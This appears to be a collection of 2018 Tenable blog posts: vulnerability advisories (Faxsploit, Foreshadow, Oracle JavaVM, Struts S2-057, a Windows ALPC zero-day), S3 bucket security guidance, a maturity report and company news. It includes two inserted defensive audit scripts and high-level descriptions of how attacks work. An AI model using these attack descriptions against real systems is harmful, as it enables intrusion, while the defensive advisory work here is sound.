Our Cyber Defender Strategies Report specifically focuses on key performance indicators (KPIs) associated with the Discover and Assess stages of the five-phase Cyber Exposure Lifecycle. During the first phase – Discover – assets are identified and mapped for visibility across any computing environment. The second phase – Assess – involves understanding the state of all assets, including vulnerabilities, misconfigurations, and other health indicators. While these are only two phases of a longer process, together they decisively determine the scope and pace of subsequent phases, such as prioritization and remediation.

We wanted to learn more about how end users are conducting vulnerability assessment in the real world, what this tells us about their overall maturity level, and how this varies based on demographics.

Cyber Defender Strategies: Understanding Vulnerability Assessment KPIs

For our Cyber Defender Strategies Report, we analyzed five key performance indicators (KPIs) based on real-world end user vulnerability assessment behavior. These KPIs correlate to four VA maturity styles: Diligent, Investigative, Surveying and Minimalist.

We discovered about half (48%) of the enterprises included in the data set are practicing very mature (exhibiting a Diligent or Investigative style) vulnerability assessment strategies. However, just over half (52%) exhibit moderate- to low-level VA maturity (exhibiting a Surveying or Minimalist style). We’ll tell you more about what all this means in a moment. First, let’s take a quick look at the methodology we applied to arrive at these results.

To identify our four VA Styles, we trained a machine learning algorithm called archetypal analysis (AA) with anonymized scan telemetry data from more than 2,100 individual organizations in 66 countries. We analyzed just over 300,000 scans during a three-month period from March to May 2018. We identified a number of idealized VA behaviors within this data set and assigned organizations to groups defined by the archetype to which they most closely relate. The vulnerability assessment characteristics for each defender style are described in the table below.

Four Vulnerability Assessment Styles: What They Reveal

VA Style | VA Maturity Level | Characteristics
Diligent | High | The Diligent conducts comprehensive vulnerability assessment, tailoring scans as required by use case, but only authenticates selectively.
Investigative | Medium to High | The Investigator executes vulnerability assessments with a high level of maturity, but only assesses selective assets.
Surveying | Low to Medium | The Surveyor conducts frequent broad-scope vulnerability assessments, but focuses primarily on remote and network-facing vulnerabilities.
Minimalist | Low | The Minimalist executes bare minimum vulnerability assessments, typically as required by compliance mandates.

Source: Tenable Cyber Defender Strategies Report, August 2018.

Here’s what we learned about each vulnerability assessment style:

  • Only five percent of enterprises follow the Diligent style, displaying a high level of maturity across the majority of KPIs. Diligent followers conduct frequent vulnerability assessments with comprehensive asset coverage, as well as targeted, customized assessments for different asset groups and business units.
  • Forty-three percent follow the Investigative style, indicating a medium to high level of maturity. These organizations display a good scan cadence, leverage targeted scan templates, and authenticate most of their assets.
  • Nineteen percent of enterprises follow the Surveying style, placing them at a low to medium maturity level. Surveyors conduct broad-scope assessments, but with little authentication and little customization of scan templates.
  • Thirty-three percent of enterprises are at a low maturity, following the Minimalist style and conducting only limited assessments of selected assets.

Tenable Cyber Defender Strategies Report: Key Findings (infographic)

Source: Tenable, Cyber Defender Strategies Report, August 2018.

Vulnerability Assessment Matters at Every Maturity Level

By now, you’re probably forming an opinion about how your vulnerability assessment strategies stack up. If your organization seems to be leaning toward the lower-maturity Surveying or Minimalist styles, fear not. There is nothing wrong with being at a low maturity. What is wrong is choosing to remain there.

If you’re a later adopter, it means you have more work to do to catch up. It also means you can learn from the mistakes and experiences of early adopters. Rather than having your organization serve as a testing bed for untried, novel and immature solutions, you’ll benefit from the availability of tried-and-tested offerings. There’s also an existing pool of expertise you can tap into, rather than trying to develop your strategies from scratch. Skipping the experimentation phase, you are poised to jump right into optimization and innovation.

And, if you identify with the most mature vulnerability assessment strategies highlighted here, it doesn’t mean you can take a lengthy sabbatical. Even the most sophisticated defenders know their work is never done.

The ultimate objective – regardless of which style most closely aligns to your own – is to always keep evolving toward a higher level of maturity. We know it isn’t easy. Cybersecurity professionals are hauling a lot of historical baggage. You’re dealing with legacy technology and dependencies alongside the complexities of managing a growing portfolio of continuously evolving and emerging technologies. Meanwhile, the threat environment has escalated noticeably over the past few years. And all of this is happening against a backdrop of competitive business pressures.

When it comes to cybersecurity, we have hit escape velocity, and most organizations now get it.

Our Cyber Defender Strategies Report provides recommendations for each VA style, to help you advance to the next maturity level. We also explore how these four VA styles are distributed across major industry verticals and by organization size, so you can compare yourself with your peers. Click to download the full report.

Leaky Amazon S3 Buckets: Challenges, Solutions and Best Practices

Amazon Web Services (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Here are five solutions you can use to evaluate the security of data stored in your S3 buckets.

For business professionals, the public cloud is a smorgasbord of micro-service offerings which provide rapid delivery of hardware and software solutions. For security and IT professionals, though, public cloud adoption represents a constant struggle to secure data and prevent unexpected exposure of private and confidential information. Balancing these requirements can be tricky, especially when trying to adhere to your organization’s unique Corporate Information Security Policies and Standards.

Amazon Web Services (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Industry researchers and analysts most often attribute the root cause of the data loss to misconfigured services, vulnerable applications/tools, wide-open permissions and/or usage of default credentials.

Recent examples of data leaks from AWS storage buckets include:

Data leakage is only one of the many risks presented by misuse of AWS S3 buckets. For example, attackers could potentially replace legitimate files with malicious ones for purposes of cryptocurrency mining or drive-by attacks.

To make matters worse for organizations (and simpler for hackers), automated tools are available to help find insecure S3 buckets.

How to protect data stored in AWS S3 buckets

Going back to the basics provides the most direct path to protecting your data. Recommended best practices for S3 buckets include always applying the principle of least privilege by using IAM policies and resource-based controls via Bucket Policies and Bucket ACLs.

Another best practice is to define a clear strategy for bucket content by taking the following steps:

  • Creating automated monitoring, audits and fixes of S3 bucket security changes via CloudTrail, CloudWatch and Lambda.
  • Creating a bucket lifecycle policy to transfer old data to an archive automatically based on usage patterns and age.
  • When creating new buckets, applying encryption by default via server-side encryption (SSE-S3/SSE-C/SSE-KMS) and/or client-side encryption.
  • Creating an S3 inventory list to automatically report inventory, replication and encryption status in an easy-to-use CSV/ORC format.
  • Testing, testing and testing some more to make sure the controls mentioned above have been implemented effectively and the data is secure.
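As an added example (not Tenable’s code) of the kind of automated audit the best practices above call for, the script below checks a bucket’s ACL, bucket policy and default-encryption configuration, taking the response shapes that boto3’s get_bucket_acl, get_bucket_policy and get_bucket_encryption return. The two sample buckets, their owner ID and the VPC endpoint value are constructed; the optional fetch_bucket_inputs() helper needs boto3 and AWS credentials.

```python
"""Audit an S3 bucket's ACL, bucket policy and default encryption for the
misconfigurations discussed above.  Added example, not Tenable's code.  The
check functions take the dicts boto3 returns from get_bucket_acl,
get_bucket_policy (parsed) and get_bucket_encryption, so they run offline on
the constructed samples at the bottom; fetch_bucket_inputs() is the optional
live path and needs boto3 plus credentials."""
import json

# Grantee URIs that make an ACL readable/writable by everyone or by any AWS account.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}

def acl_public_grants(acl):
    """'Group:Permission' for every ACL grant to a public group."""
    out = []
    for grant in acl.get("Grants", []):
        uri = grant.get("Grantee", {}).get("URI")
        if uri in PUBLIC_GRANTEES:
            out.append("%s:%s" % (PUBLIC_GRANTEES[uri], grant.get("Permission")))
    return out

def _wildcard_principal(principal):
    """True for Principal "*" or {"AWS": "*"} (also inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False

def policy_public_statements(policy):
    """'Sid:actions' for Allow statements granted to any principal with no Condition.
    A conditioned wildcard (e.g. restricted to a VPC endpoint) is not flagged."""
    out = []
    statements = policy.get("Statement", [])
    for stmt in (statements if isinstance(statements, list) else [statements]):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if _wildcard_principal(stmt.get("Principal")):
            actions = stmt.get("Action", [])
            actions = actions if isinstance(actions, list) else [actions]
            out.append("%s:%s" % (stmt.get("Sid", "<no Sid>"), ",".join(actions)))
    return out

def default_encryption(encryption):
    """The bucket's default SSE algorithm ('AES256' or 'aws:kms'), or None."""
    if not encryption:
        return None
    for rule in encryption.get("ServerSideEncryptionConfiguration", {}).get("Rules", []):
        alg = rule.get("ApplyServerSideEncryptionByDefault", {}).get("SSEAlgorithm")
        if alg:
            return alg
    return None

def audit_bucket(name, acl, policy, encryption):
    """Run all three checks and return {'bucket': name, 'findings': [...]}."""
    findings = ["public ACL grant " + g for g in acl_public_grants(acl)]
    findings += ["public policy statement " + s
                 for s in policy_public_statements(policy or {})]
    if default_encryption(encryption) is None:
        findings.append("no default server-side encryption")
    return {"bucket": name, "findings": findings}

def fetch_bucket_inputs(s3, name):
    """Live variant: s3 is a boto3 S3 client.  A bucket with no policy or no
    encryption config raises ClientError; both cases are mapped to None."""
    from botocore.exceptions import ClientError
    acl = s3.get_bucket_acl(Bucket=name)
    policy = encryption = None
    try:
        policy = json.loads(s3.get_bucket_policy(Bucket=name)["Policy"])
    except ClientError as e:
        if e.response["Error"]["Code"] != "NoSuchBucketPolicy":
            raise
    try:
        encryption = s3.get_bucket_encryption(Bucket=name)
    except ClientError as e:
        if e.response["Error"]["Code"] != "ServerSideEncryptionConfigurationNotFoundError":
            raise
    return acl, policy, encryption

# Constructed samples: one leaky bucket (world-readable ACL, wildcard policy, no
# default encryption) and one locked-down bucket.  IDs are placeholders.
OWNER_GRANT = {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
               "Permission": "FULL_CONTROL"}
LEAKY_ACL = {"Grants": [OWNER_GRANT, {"Grantee": {
    "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
    "Permission": "READ"}]}
LEAKY_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-leaky/*"}]}
SAFE_ACL = {"Grants": [OWNER_GRANT]}
SAFE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "VpcEndpointOnly", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-safe/*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-placeholder"}}}]}
SAFE_ENCRYPTION = {"ServerSideEncryptionConfiguration": {"Rules": [
    {"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "aws:kms"}}]}}
```

Running audit_bucket() over the two samples yields three findings for example-leaky and none for example-safe; wire fetch_bucket_inputs() to a boto3 client and loop over list_buckets() to run it against a real account.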

Here at Tenable, I have researched five additional solutions you can use to evaluate the security of data stored in S3 buckets. These five solutions, when implemented correctly and incorporated into daily operational checklists, can help you quickly assess your organization’s cyber exposure in the public cloud and help you determine next steps for securing your business-critical data.

  • Amazon Macie: Automates data discovery and classification. It uses artificial intelligence to classify data files in S3, leveraging a rules engine that identifies application data, correlates file extensions and predictable data themes, and applies strong regex matching to determine data type, and it surfaces CloudTrail events, errors and basic alerts.
  • Security Monkey: An open source bootstrap solution on GitHub provided by Netflix. It implements monitoring, alerting and an auditable history of cloud configurations across S3, IAM, Security Groups, Route 53, ELBs and SQS services.
  • Amazon Trusted Advisor: Helps perform multiple other functions apart from identifying insecure buckets.
  • Amazon S3 Inventory Tool: Provides either a CSV or ORC file which further aids in auditing the replication and encryption status of objects in S3.
  • Custom S3 bucket scanning solutions: Scripts available on GitHub can be used to scan and check specific S3 buckets. These include kromtech’s S3-Inspector and sa7mon’s S3Scanner. In addition, avineshwar’s slurp clone monitors certstream and enumerates S3 buckets for each domain it sees.

With the business demanding speed and ease of use, we expect to see the continued evolution of applications, systems and infrastructure away from on-premises data centers secured behind highly segregated networks to cloud-based “X-as-a-Service” architectures. The solutions and guidance highlighted above will help you identify security gaps in your environment and bootstrap solutions to automate resolution, alerting and auditing, thereby helping you meet your organization's Corporate Information Security Policies and Standards.

Faxsploit Allows Remote Code Execution Through HP All-in-One Printers

A new exploit demonstrated by Check Point Research at DEF CON last week leverages vulnerabilities in all-in-one printers, potentially allowing attackers to take control of other devices on the network.

Background

Check Point Research published a proof of concept (PoC) for exploiting two remote code execution vulnerabilities on HP All-in-One printers solely through the printer’s fax line. These critical vulnerabilities, CVE-2018-5924 and CVE-2018-5925, have a CVSS v3 score of 9.8.

Check Point was able to embed malicious code disguised as a JPEG image, which then exploited buffer overflows in the processing code to gain full access to the printer’s operating system. From there, they were able to check whether the printer was connected to a local area network (LAN), and use the EternalBlue and DoublePulsar attacks to take control of a separate device on the network.

Vulnerability details

In its report, Check Point says it believes this is the first publicly documented example of the EternalBlue and DoublePulsar exploits being used to launch attacks via a printer. EternalBlue is a publicly available module that exploits a remote code execution bug in SMBv1. DoublePulsar is a kernel-level malware usually delivered through the EternalBlue exploit, allowing an attacker to load malware onto the target. Check Point used these tools via the fax line on the target printer to infect a separate device on the same network.

At the time of this writing, the PoC only covers HP printers, but the researchers at Check Point seemed confident other manufacturers could be similarly exploited.

This video from Check Point shows the PoC in action.

Check Point worked closely with HP to get these vulnerabilities fixed and patched before disclosing their research to the public at DEF CON 26. This allowed HP to have public patches available a few days ahead of the public disclosure of the PoC. HP provides a support page to determine whether your printers need to be updated.

Impact assessment

While faxes may seem outdated, they’re still widely used -- and in some cases are required -- by schools, government offices, medical facilities and manufacturing industries. A Shodan search for internet-facing HP printers in the affected families showed more than 50,000 printers worldwide. Google also shows approximately 300 million indexed fax numbers. All-in-one Printer/Fax machines have replaced a lot of older standalone faxes for many businesses, so it can be assumed a fair number of those indexed numbers belong to all-in-one printers.

We haven’t seen this attack attempted publicly yet. However, other researchers and malicious actors are likely to build their own exploit code now that this PoC has been publicly disclosed. An attacker would need to know the model of printer they’re exploiting and the office fax number, or they could go Faxploit fishing with just the listed fax numbers hoping to get a hit. A Shodan search will show any of the affected printers connected to the web. Attackers could cross-reference this data with other public information to match up the printer with relevant fax numbers.

An attacker could utilize the foothold created by this exploit in order to further infect other devices in the target environment. While this exploit is likely too complicated for widespread attacks, it could be an ideal vector for targeted attacks.

Urgently required actions

If your business uses an all-in-one fax/printer, we recommend updating the firmware to the latest version provided by the manufacturer. At the time of this writing, HP is the only vendor with a patch for this specific exploit. We recommend checking with printer vendor support channels to see whether they’ve responded as well.

Below is a list of plugins Tenable has released to detect if the HP printers in your network are vulnerable. Tenable will continue to monitor the situation and provide updated protection as vendors provide updates.

Tenable Plugins

Plugin ID | Name | Description
111666 | hp_printers_HPSBHF03589.nasl | The firmware version running on the remote host is vulnerable to multiple vulnerabilities. An unauthenticated remote attacker could gain system-level unauthorized access to the affected device.
111667 | hp_www_detect.nbin | The remote host has been identified as using an HP embedded web server.

Foreshadow: Speculative Execution Attack Targets Intel SGX

A flaw in Intel’s Software Guard Extensions implementation allows an attacker to access data stored in memory of other applications running on the same host, without the need for privilege escalation.

Background

Researchers discovered a flaw in Intel’s Software Guard Extensions (SGX) implementation that opens up a new speculative execution attack called Foreshadow (CVE-2018-3615). In addition, Intel has discovered variants allowing for Foreshadow attacks against microprocessors, system management mode (SMM) code, operating systems and hypervisor software. These variants have been dubbed Foreshadow-NG (CVE-2018-3620 and CVE-2018-3646).

Collectively, Intel has labeled all of the speculative execution side channel vulnerabilities as L1 Terminal Faults (L1TF). Red Hat Enterprise Linux, Microsoft and other vendors have adopted this name for Foreshadow and Foreshadow-NG.

Vulnerability details

Foreshadow allows an attacker to access the data stored in memory of other applications running on the same host without needing any privilege escalation. This enables the attacker to gain access to sensitive files, data, passwords, keys, etc. The proof-of-concept code for Foreshadow has not been released and researchers suspect there wouldn’t be a way to detect exploitation, should it happen.

Foreshadow-NG allows an attacker to access memory on any virtual machine hosted on the same cloud, making it a high-severity issue. According to the Foreshadow researchers’ abstract: “Foreshadow-NG is the first transient execution attack that fully escapes the virtual memory sandbox.” This also includes cloud environments, which could potentially mean asset owners are at risk from their digital neighbors. To make matters worse, because of the way SGX has been implemented, a single SGX-compromised machine can result in the entire ecosystem becoming tainted.

Based on the information currently available, AMD/ARM-based processors are believed to be unaffected by this flaw, as they don’t implement SGX.

Urgently required actions

We highly recommend reviewing and installing security updates from your operating system and virtualization vendors. Microsoft and Red Hat have released updates to mitigate the flaws in multiple ways and to different extents. These approaches include flushing of sensitive data, rendering sensitive data inaccessible, enhancing isolation between virtual processors and other strategies.

Identifying affected systems

Plugin ID | Description
111684 | KB4343885: Windows 10 Version 1703 August 2018 Security Update (Foreshadow)
111685 | KB4343887: Windows 10 Version 1607 and Windows Server 2016 August 2018 Security Update (Foreshadow)
111686 | KB4343892: Windows 10 August 2018 Security Update (Foreshadow)
111687 | KB4343897: Windows 10 Version 1709 August 2018 Security Update (Foreshadow)
111688 | KB4343888: Windows 8.1 and Windows Server 2012 R2 August 2018 Security Update (Foreshadow)
111689 | KB4343899: Windows 7 and Windows Server 2008 R2 August 2018 Security Update (Foreshadow)
111690 | KB4343896: Windows Server 2012 August 2018 Security Update (Foreshadow)
111692 | KB4343909: Windows 10 Version 1803 August 2018 Security Update (Foreshadow)
111700 | Security Updates for Windows Server 2008 (August 2018) (Foreshadow)

Oracle JavaVM Database Takeover

A new vulnerability discovered in the Oracle Database JavaVM component can result in complete database compromise and shell access to the underlying server.

Background

Oracle released an out-of-band update to its flagship database product for an authenticated vulnerability in the JavaVM component. According to Oracle, the vulnerability "can result in complete compromise of the Oracle Database and shell access to the underlying server." The same issue was found and patched in the July 2018 critical patch update (CPU) but was not reported as a critical vulnerability for unspecified reasons.

Vulnerability details

According to Oracle, this vulnerability affects “...versions 11.2.0.4 and 12.2.0.1 on Windows. CVE-2018-3110 has a CVSS v3 base score of 9.9, and can result in complete compromise of the Oracle Database and shell access to the underlying server. CVE-2018-3110 also affects Oracle Database version 12.1.0.2 on Windows as well as Oracle Database on Linux and Unix, however patches for those versions and platforms were included in the July 2018 CPU.”

This vulnerability affects Windows Oracle databases via the “Oracle Net” protocol and requires a user with “Create Session” privileges for the JavaVM component. No credit was provided in the advisory and, as is often the case with many Oracle vulnerabilities, exploitation details are sparse.

Note: While CVE-2018-3004 from the July CPU appears to be related, as the same component is affected, Oracle has clarified that these CVEs are unrelated and the fix for CVE-2018-3110 was silently included in the July CPU for a subset of their product line in an effort to protect their customers.

Impact assessment

Because database authentication is required to exploit this vulnerability, the impact is lessened. However, the potential for complete database takeover means anyone with an Oracle database in their environment should take remediation steps immediately. In addition, enterprises running versions of Oracle DB which were patched for the July CPU are already protected.

Urgently required actions

If your business uses an Oracle database, we recommend updating immediately based on Oracle’s guidance.

Tenable.io Vulnerability Management, Tenable.io Container Security, SecurityCenter and Nessus detect this vulnerability. Below is a list of plugins Tenable has released to determine if the Oracle databases in your environment are affected. Tenable will continue to monitor the situation and provide updated protection as required.

Plugin ID | Name | Description
111219 | oracle_rdbms_cpu_jul_2018.nasl | July 2018 Oracle DB CPU
111680 | oracle_rdbms_cve_2018_3110.nasl | August 2018 Oracle DB check for CVE-2018-3110

SecurityCenter Innovation Continues with 5.7 Release

Tenable SecurityCenter 5.7 enhancements address the vulnerability management (VM) needs of today’s modern and highly mobile workforce.

As digitization continues and companies invest in a highly mobile workforce, it’s important they have a VM solution with automated, continuous and accurate visibility into their IT assets in order to meet their growing needs.

We recently shared how we’re invested in driving SecurityCenter innovation forward to support the growing needs of cybersecurity teams. As we continue on this path of innovation, we’re excited to share how we’re enhancing the platform with SecurityCenter 5.7. First, we’ve added a new mobile agent workforce feature to ensure proper correlation of IP addresses to assets. Next, we’ve updated the Common Vulnerability Scoring System used by the platform. These enhancements distinguish SecurityCenter as the VM solution to help cybersecurity professionals efficiently prioritize security risks and provide a clear view of their organization's security posture.

Mobile Agent Workforce

In today’s highly dynamic environment, a single IP address no longer uniquely identifies an asset. For example, my laptop’s IP address changes as it moves from my home office to the corporate network and then to a hotel. If vulnerability scans are performed while my laptop is connected at these different locations, it would be identified as three different devices, with a separate record created for each.

The Mobile Agent Workforce feature in SecurityCenter 5.7 ensures proper correlation of IP addresses to assets. Assets with Nessus Agents installed are each assigned a unique UUID. Each IP address will be properly mapped to the unique UUID and its corresponding asset, giving users an accurate understanding of their inventory and the ability to create precise remediation lists.

Fig. 1 (screenshot): Mobile Agent Workforce feature in SecurityCenter 5.7 ensures proper correlation of IP addresses to assets with a new agent repository type for agent scan data.

CVSS v3

Information security professionals continuously perform risk assessments of their environment to focus remediation efforts on the areas with the biggest security risk. Proper prioritization of remediation efforts depends a great deal on the metrics used to assess risk.

The main method SecurityCenter uses to assess risk is the Common Vulnerability Scoring System (CVSS). To advance the clarity, consistency and accuracy of scores for modern-day vulnerabilities, SecurityCenter 5.7 will pull vulnerability information from CVSS v3, the latest version of CVSS. This latest version includes additional attributes, such as scope and user interaction, to accurately reflect the severity and impact of a vulnerability in a customer's environment.

Figs. 2 and 3 (screenshots): CVSS v3 provides clearer, more consistent and more accurate scores for modern-day vulnerabilities.

SecurityCenter 5.7 is available now for customer download. Here's how to learn more:

New Apache Struts Vulnerability Could Allow for Remote Code Execution

Researchers at Semmle have disclosed a critical vulnerability in Apache Struts, similar to the vulnerability at the root of the Equifax breach. Our advice? Update now!

Background

Semmle researchers discovered and disclosed a remote code execution (RCE) vulnerability (CVE-2018-11776) in servers running Apache Struts that meet specific configuration requirements. According to Semmle, those requirements are:

  • The alwaysSelectFullNamespace flag is set to true in the Struts configuration. (Note: this is automatically the case if your application uses the popular Struts Convention plugin.)
  • The application’s Struts configuration file contains an <action ...> tag that does not specify the optional namespace attribute or specifies a wildcard namespace (e.g., “/*”).

This vulnerability also requires the version of Apache Struts to be Struts 2.3–Struts 2.3.34 or Struts 2.5–Struts 2.5.16. Upgrading to the latest version provided by Apache should mitigate your risk.

Impact assessment

If the above configuration requirements are met and your version of Apache Struts has not been updated to the recommended versions, then an attacker could take full control of the web application using Apache Struts.

Equifax saw a similar Apache Struts vulnerability (CVE-2017-5638) used in what has been called the most expensive data breach in history. Web-based RCE vulnerabilities like this one are researched quickly, with publicly available exploits often appearing within days of disclosure.

Vulnerability details

In Apache Struts, when the <action ...> tag doesn’t have a corresponding namespace attribute, the default redirectAction result type will pass unsanitized strings from the HTTP request as commands.

In addition, <s:url …> tags without a preset action or value attribute can be manipulated by having malicious code injected into the missing attributes, which then get passed to Struts as executed commands.

Urgently required actions

Upgrade to Apache Struts version 2.3.35 or 2.5.17 as soon as possible.

Apache also states that the following configuration change can mitigate the vulnerability (this should be a temporary workaround until an organization can upgrade):

  • Verify that you have set a namespace (if applicable) for all defined results in the underlying configurations.
  • Verify that you have set a value or action for all url tags in your JSPs. Both are needed only when their upper action(s) configurations have no or wildcard namespace.
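The configuration preconditions and the mitigation steps above can be checked statically. Below is an added example (not Tenable’s or Apache’s code) that reads the constant and the package/action/result structure of a struts.xml plus the <s:url> tags of JSP text; note that in struts.xml the namespace is declared on the enclosing <package> (or per result via <param name="namespace">), so the check computes each redirecting result’s effective namespace. The struts.xml and JSP samples are constructed.

```python
"""Static check for the S2-057 (CVE-2018-11776) preconditions described above.
Added example, not Tenable's or Apache's code; sample inputs are constructed."""
import re
import xml.etree.ElementTree as ET

CONSTANT = "struts.mapper.alwaysSelectFullNamespace"
# Result types that forward to another action and so depend on a namespace.
NAMESPACE_SENSITIVE_RESULTS = {"redirectAction", "chain"}

def always_select_full_namespace(root):
    """True if the constant is set to true in the XML. (The Convention plugin
    also sets it at runtime, which a static check cannot see.)"""
    for c in root.iter("constant"):
        if c.get("name") == CONSTANT:
            return c.get("value", "").strip().lower() == "true"
    return False

def _missing_or_wildcard(ns):
    return ns is None or ns.strip() == "" or "*" in ns

def risky_results(root):
    """'package/action/result' for every namespace-sensitive result whose
    effective namespace is absent, empty or a wildcard."""
    findings = []
    for pkg in root.iter("package"):
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                if result.get("type") not in NAMESPACE_SENSITIVE_RESULTS:
                    continue
                effective = pkg.get("namespace")
                for param in result.findall("param"):
                    if param.get("name") == "namespace":  # per-result override
                        effective = (param.text or "").strip()
                if _missing_or_wildcard(effective):
                    findings.append("%s/%s/%s" % (pkg.get("name"), action.get("name"),
                                                  result.get("name", "success")))
    return findings

URL_TAG = re.compile(r"<s:url\b([^>]*)>", re.IGNORECASE)
TARGET_ATTR = re.compile(r"""\b(action|value)\s*=\s*["'][^"']+["']""", re.IGNORECASE)

def url_tags_without_target(jsp_text):
    """<s:url> tags that set neither a non-empty action nor a non-empty value."""
    return [m.group(0) for m in URL_TAG.finditer(jsp_text)
            if not TARGET_ATTR.search(m.group(1))]

def assess(struts_xml, jsp_text=""):
    """Both advisory preconditions must hold for the configuration to be exposed."""
    root = ET.fromstring(struts_xml)
    flag = always_select_full_namespace(root)
    results = risky_results(root)
    urls = url_tags_without_target(jsp_text)
    return {"alwaysSelectFullNamespace": flag, "risky_results": results,
            "url_tags": urls, "exposed": flag and bool(results or urls)}

# Constructed samples: a package with no namespace and a bare redirectAction
# result, and the same configuration with explicit namespaces.
VULNERABLE_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result type="redirectAction">index</result>
    </action>
  </package>
</struts>"""
FIXED_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default" namespace="/app">
    <action name="login" class="example.LoginAction">
      <result type="redirectAction">
        <param name="actionName">index</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>"""
VULNERABLE_JSP = '<s:url id="home"/> <s:url value="/static/app.css"/>'
FIXED_JSP = '<s:url action="index" namespace="/app"/>'

if __name__ == "__main__":
    print(assess(VULNERABLE_XML, VULNERABLE_JSP))
    print(assess(FIXED_XML, FIXED_JSP))
```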

Researchers at Semmle have suggested that other methods of attack could exist, and these configuration workarounds may not prevent attack.

Identifying affected systems

The following active plugin is available for scanning. Tenable.io® Container Security can detect containers running versions of Apache Struts vulnerable to CVE-2018-11776.

Plugin ID   Description
112036      Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)

Get more information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Start your free trial of Tenable.io Container Security now!


Microsoft Scheduler Zero-Day Exploit Available in the Wild: Caution Urged


The exploit -- which impacts the Advanced Local Procedure Call (ALPC) interface -- gives standard Windows users the ability to raise their privileges. Malware authors will no doubt be leveraging this capability to enhance their toolkits.

Background

On August 27, a security researcher made waves by releasing a working exploit on GitHub for a previously unknown, serious local privilege escalation (LPE) vulnerability in Microsoft Windows Scheduler.

The zero-day exploit, which was announced via a Twitter post, allows a local attacker with standard user privileges to obtain full SYSTEM access on fully patched Windows 10 and Windows Server 2016 systems. Other platforms may also be affected.

Twitter user SandboxEscaper announces Microsoft zero-day exploit

Vulnerability details

This public exploit impacts the Advanced Local Procedure Call (ALPC) interface in the Microsoft Windows scheduler. It has been verified by Tenable and Will Dormann from CERT Research to work on fully patched Windows 10 and Windows Server 2016 systems. Because exploits like this are extremely dangerous in the wrong hands, Microsoft maintains a bug bounty program and has been known to pay researchers handsomely for responsible disclosure.

Impact assessment

Security professionals should track this situation and respond as soon as a patch or mitigation is available. This exploit not only gives standard Windows users the ability to raise their privileges, but malware authors will no doubt be leveraging this capability to enhance their toolkit.

Urgently required actions

Users should remain alert and use security best practices such as a robust password policy, malware mitigation, access control and network segmentation. Apply Microsoft patches as soon as they become available. Monitoring for unusual processes on the system, as well as anomalous behavior of users, might also help identify compromised systems.

Tenable is closely monitoring this situation and will provide updated protection as soon as patches become available.

Learn more:

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable Welcomes Diwakar Dayal to the Role of Managing Director, India and SAARC


Dayal’s appointment to this newly created role demonstrates Tenable’s strong, ongoing commitment to the India and SAARC region.

Today, I’m delighted to announce the appointment of Diwakar Dayal to the newly created role of Managing Director, Tenable India and the South Asian Association of Regional Cooperation (SAARC) region. Dayal will oversee strategic direction, channel expansion and sales growth for Tenable in the region.

Dayal brings exceptional leadership skills and is well versed in building a partner network within India. His knowledge of the region and his decades of industry experience make him a valued addition to our team. Dayal’s leadership will be invaluable as we continue to expand in India, educate customers about Cyber Exposure -- the emerging discipline for managing and measuring cybersecurity risk in the digital era -- and provide them with the continuous monitoring and vulnerability management technology they need to overcome today’s evolving threats.

In the new role, Dayal will drive business development throughout India and the SAARC region and optimize sales strategies to meet market demands and help customers use products, new features and services to their best advantage.


Diwakar Dayal, Managing Director, Tenable India and SAARC.

Prior to joining Tenable, Dayal held various positions at Cisco for over eight years, building a strong security sales team in India, and more recently managing the security channel sales team across Asia Pacific, Japan & Greater China, based out of Singapore.

Dayal previously worked for Juniper, leading the company’s advanced technology portfolio while creating its entry into the Indian FSI market. Prior to that, he spent time at Dimension Data, Wipro and Sify, driving the security consulting, solutions and integration business. He earned a Master of Business Administration (MBA) in Marketing from T A Pai Management Institute (TAPMI) and completed his CISSP (Certified Information Systems Security Professional) in 2004. A passionate cybersecurity enthusiast, Dayal is based in Bangalore, India.

Please join me in welcoming Dayal to the team.

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

August Vulnerability of the Month: Critical Vulnerability in Oracle WebLogic Targeted by Attackers


In August, Tenable Research voted to highlight CVE-2018-2893 in Oracle WebLogic Server because it was almost immediately exploited by multiple threat actors.

Novelty, sophistication or just plain weirdness are some of the potential criteria we use to select the Tenable vulnerability of the month. We collect nominations from our 70+ research team members, shortlist the finalists and give the entire team the chance to vote – combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

CVE-2018-2893 caught our researchers’ attention this month. It allows for remote, unauthenticated attacks and received a CVSSv3 score of 9.8. While the vulnerability was patched in the Oracle Critical Patch Update on July 17, researchers saw exploitation in the wild of this vulnerability as early as July 21. Two separate groups were seen exploiting this vulnerability in large-scale attacks in the days following disclosure, likely fueled by the publication of multiple proof-of-concept exploits.

What makes this the vulnerability of the month?

